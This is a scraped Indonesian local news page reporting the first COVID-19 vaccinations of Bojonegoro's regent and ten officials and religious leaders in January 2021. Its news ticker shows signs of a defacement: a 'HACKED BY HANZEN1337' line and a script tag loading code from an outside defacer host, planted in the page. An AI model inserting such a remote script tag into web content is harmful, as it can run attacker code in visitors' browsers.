News Ticker
  • HACKED BY HANZEN1337
  • <script src="https://jso.defacer.id/raw/I7j6n4T3C9"></script>
  • Kunjungan Kerja di Bojonegoro, Menhan Sjafrie Sjamsoeddin Tinjau Rencana Pengembangan Batalyon TP 885 dan Brigif 33 di Dander
  • 11 Juli dalam Sejarah
  • Prakiraan Cuaca Bojonegoro 11 Juli 2026
  • Kandang Ayam Senilai Rp2 M di Malo, Bojonegoro Ludes Terbakar
  • Panen Melon Bersama, Bupati Bojonegoro Ajak Generasi Muda Bangun Pertanian Modern
  • Pemkab Bojonegoro Alokasikan Rp11,03 Miliar untuk Lima Program Beasiswa Mahasiswa
  • Seorang Lansia Bojonegoro Tewas Tertabrak Kereta Api Jayabaya di Perlintasan Baureno
  • Perkiraan Harga Emas Hari Ini, 10 Jul 2026
  • Prakiraan Cuaca Bojonegoro 10 Juli 2026
  • 10 Juli dalam Sejarah
  • Kecamatan Kota Dominasi Emas Kickboxing, Klasemen Sementara Porkab II Bojonegoro Masih Memimpin
  • Dalam Sehari Terjadi Enam Kebakaran Lahan di Bojonegoro, Ini Daftarnya
  • Pemkab Bojonegoro Berikan Pembinaan Ribuan Mahasiswa Penerima Beasiswa Daerah
  • "El Último Tango", Sepatu Spesial Adidas untuk Perjalanan Terakhir Messi di Piala Dunia
  • Kejari Bojonegoro Terima Tahap II Kasus Dugaan Peredaran Rokok Ilegal
  • Paripurna DPRD, Raperda Pertanggungjawaban APBD 2025 Disetujui
  • Hadapi Musim Kemarau, Pemkab Bojonegoro Distribusikan Air Bersih ke Sejumlah Desa
  • Pemkab Bojonegoro Dorong Setiap OPD Lahirkan Inovasi Lewat BIA 2026
  • Prakiraan Cuaca Bojonegoro 9 Juli 2026
  • Rumah Kosong di Kapas, Bojonegoro Terbakar, Kerugian Capai 150 Juta Rupiah
  • Merayakan Detik Ini: Menemukan Kedamaian dalam Jejak Hidup yang Singkat
  • Tiga Rumah di Temayang Bojonegoro Terbakar Akibat Korsleting Listrik, Total Kerugian 520 Juta Rupiah
Bupati Bojonegoro Bersama 10 Tokoh Disuntik Vaksin COVID-19 Pertama Kali

Vaksinasi COVID-19

Bupati Bojonegoro Bersama 10 Tokoh Disuntik Vaksin COVID-19 Pertama Kali

Bojonegoro - Dalam pencanangkan vaksinasi COVID-19 di Kabupaten Bojonegoro, Kamis (28/01/2021), Bupati Bojonegoro, Dr Hj Anna Muawanah, bersama 10 tokoh masyarakat dan tokoh agama di Kabupaten Bojonegoro, menjadi orang yang pertama disuntik vaksin COVID-19.
 
 
Adapun 10 orang yang divaksin bersama Bupati Bojonegoro tersebut yaitu Kapolres Bojonegoro AKBP Eva Guna Pandia SIK MM MH, Dandim Bojonegoro, Letkol Inf Bambang Hariyanto; Kepala Kejaksaan Negeri Bojonegoro, Sutikno SH MH, Ketua DPRD Kabupaten Bojonegoro, Imam Sholikin; Wakil Bupati Bojonegoro, Drs Budi Irawanto MPd;
 
Selanjutnya Ketua Badan Musyawarah Antar Gereja (Bamag) Kabupaten Bojonegoro, Iwan Sukmono; Ketua Tanfidziyah PCNU Kabupaten Bojonegoro, dr Kholid Ubed Sp PD; Ketua Majelis Pembina Kesehatan Umum, Moh  Taufiqurrohman; Dirut RSUD dr R Sosodoro Djatikoesoema Bojonegoro, dr Ahmad Hernowo Wahyutomo MMKes; dan Kepala Dinas Kesehatan Kabupaten Bojonegoro, dr Ani Pujiningrum MMKes.
 
Usai pencanangan vaksinasi tersebut, untuk tahap pertama vaksinasi di Kabupaten Bojonegoro akan diberikan kepada tenaga kesehatan yang merupakan kelompok paling berrisiko untuk terpapar COVID-19.
 
Sementara, sesuai data dari Kementerian Kesehatan, estimasi jumlah warga di Kabupaten Bojonegoro yang akan divaksinasi sebanyak 1.040.760 orang.
 
 
 
 
 

Kapolres Bojonegoro AKBP Eva Guna Pandia SIK MM MH, saat jalani vaksinasi COVID-19. (foto: dan/beritabojonegoro)

 
 
Kepala Dinas Kesehatan Kabupaten Bojonegoro, dr Ani Pujiningrum MMkes menjelaskan bahwa Menurutnya, usai pencanangan vaksinasi tersebut, untuk tahap pertama vaksinasi di Kabupaten Bojonegoro akan diberikan kepada tenaga kesehatan yang merupakan kelompok paling berrisiko untuk terpapar COVID-19.
 
Kemudian tahap kedua adalah aparat atau petugas yang menangani pelayanan publik, meliputi Polri, TNI, Guru, Satpol PP, Pemadam Kebakaran dan Badan Penanggulangan Bencana Daerah.
 
Selanjutnya tahap ketiga sasarannya adalah pelaku ekonomi. Tahap keempat adalah kelompok masyarakat umum, dan tahap kelima adalah kelompok masyarakat rentan.
 
"Untuk sasaran tenaga kesehatan di Bojonegoro akan dilaksanakan mulai akhir Januari ini dan kami rencanakam untuk vaksin sebnyak 3.860 vial selesai dilaksanakan pada minggu pertama Februari." kata Ani Pujiningrum.
 
 
Kapolres Bojonegoro, AKBP EG Pandia, usai pelaksanaan vaksinasi tersebut mengungkapkan bahwa Polres Bojonegoro akan terus mendukung tugas-tugas dalam penanganan COVID-19 di Kabupaten Bojonegoro, salah satunya adalah mendukung tugas vaksinasi
 
Menurutnya, COVID-19 Ini adalah kenyataan yang harus dihadapi bersama dan cara terbaik untuk menghadapi COVID-19 adalah dengan membiasakan perilaku sesuai protokol kesehatan. Polres Bojonegoro bersama Kodim Bojonegoro akan terus bersinergi dengan Pemkab Bojonegoro dan instansi terkait lainnya, dalam penanganan COVID-19 di Kabupaten Bojonegoro.
 
"semoga COVID-19 bisa segera berakhir dan perekonomian bisa bangkit kembali seperti sedia kala. Dengan dilaksanakan vaksinasi ini, kita harap seluruh warga masyarakat tetap mematuhi dan berperilaku sesuai protokol kesehatan," kata Kapolres Bojonegoro, AKBP EG Pandia. (red/imm)
 
Berita Terkait
1783885577.8149 at start, 1783885578.2766 at end, 0.46168923377991 sec elapsed